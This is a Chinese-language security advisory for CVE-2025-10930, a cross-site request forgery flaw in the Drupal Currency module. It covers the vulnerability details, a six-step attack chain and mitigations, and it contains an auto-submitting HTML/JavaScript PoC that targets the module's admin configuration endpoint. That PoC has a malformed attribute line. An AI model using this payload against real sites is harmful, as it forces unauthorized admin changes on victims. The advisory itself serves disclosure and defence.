CVE-2025-10930 Drupal Currency跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-10930

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Drupal Currency

漏洞概述

CVE-2025-10930是Drupal Currency模块中的一个跨站请求伪造(CSRF)漏洞。该漏洞存在于Currency模块的特定功能中，攻击者可以诱导已登录的管理员用户在不知情的情况下执行非预期的操作。由于Drupal Currency模块处理货币相关的敏感业务逻辑，CSRF漏洞可能导致恶意修改货币配置、汇率设置或触发其他管理员操作。攻击者通过构造恶意链接或嵌入恶意HTML内容，利用用户浏览器自动发送认证凭证的特性，在用户已登录的状态下执行未经授权的请求。该漏洞影响版本从0.0.0到3.5.0之前的所有版本，CVSS评分4.3属于中等严重程度，主要风险在于需要用户交互和低权限影响。

技术细节

该CSRF漏洞存在于Drupal Currency模块的表单处理机制中。Drupal的表单系统通常依赖token验证来防止CSRF攻击，但Currency模块的某些表单处理函数缺少适当的token验证或验证机制存在缺陷。攻击者可以创建一个包含恶意表单的网页，当管理员用户访问该页面时，浏览器会自动向Drupal站点发送已认证的请求。由于Drupal使用session cookie进行身份验证，恶意请求会携带有效的session信息，导致服务器认为这是合法的管理员操作。攻击者通常针对Currency模块的货币配置更新、汇率导入或货币格式设置等功能发起攻击。攻击者可以利用JavaScript自动提交表单或诱导用户点击触发按钮，在后台静默执行恶意请求。

攻击链分析

STEP 1

步骤1: 侦察阶段

攻击者识别目标网站使用Drupal CMS并安装了Currency模块，版本低于3.5.0

STEP 2

步骤2: 构造恶意页面

攻击者创建包含恶意表单的HTML页面，表单内容针对Currency模块的管理端点

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、恶意链接或嵌入iframe等方式诱导Drupal管理员访问恶意页面

STEP 4

步骤4: 自动提交请求

管理员浏览器加载恶意页面后，JavaScript自动提交包含管理员认证session的POST请求

STEP 5

步骤5: 执行恶意操作

Drupal服务器收到请求后，由于session有效且缺少CSRF token验证，执行攻击者指定的操作

STEP 6

步骤6: 攻击完成

Currency模块配置被恶意修改，如更改默认货币、汇率或破坏货币格式化设置

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-10930 -->
<!-- This PoC demonstrates a CSRF attack targeting Drupal Currency module -->
<!-- When an admin visits this page, it will attempt to submit a malicious request -->

<!DOCTYPE html>
<html>
<head>
    <title>Currency Configuration Update</title>
</head>
<body>
    <h1>Currency Configuration Update PoC</h1>
    <p>This page demonstrates the CSRF vulnerability in Drupal Currency module.</p>
    
    <!-- Malicious form targeting Currency module admin interface -->
    <form id="csrfForm" action="https://target-drupal-site.com/admin/config/currency" method="POST" style="display:none;">
        <input type="hidden" name="currency[config][default_currency]" value="XXX" />
        <input type="hidden"="form_token" value="exploited" />
        <input type="hidden" name="op" value="Save configuration" />
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.addEventListener('DOMContentLoaded', function() {
            // Submit the malicious form
            document.getElementById('csrfForm').submit();
            console.log('CSRF payload submitted');
        });
    </script>
    
    <p>If you see this message, the form has been submitted.</p>
</body>
</html>

影响范围

Drupal Currency < 3.5.0

Drupal Currency 0.0.0 - 3.4.x

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1) 临时禁用Currency模块的非必要功能；2) 加强对管理员账户的安全培训，提醒不要点击未知链接；3) 使用浏览器CSRF保护插件；4) 在Web应用防火墙(WAF)层面添加CSRF攻击检测规则；5) 限制管理员访问后台的IP地址范围；6) 定期检查Currency模块的配置变更日志，及时发现异常修改。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-10930
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-10930
3 Details https://www.cvedetails.com/cve/CVE-2025-10930/
4 VulDB https://vuldb.com/cve/CVE-2025-10930
5 Link https://www.drupal.org/sa-contrib-2025-110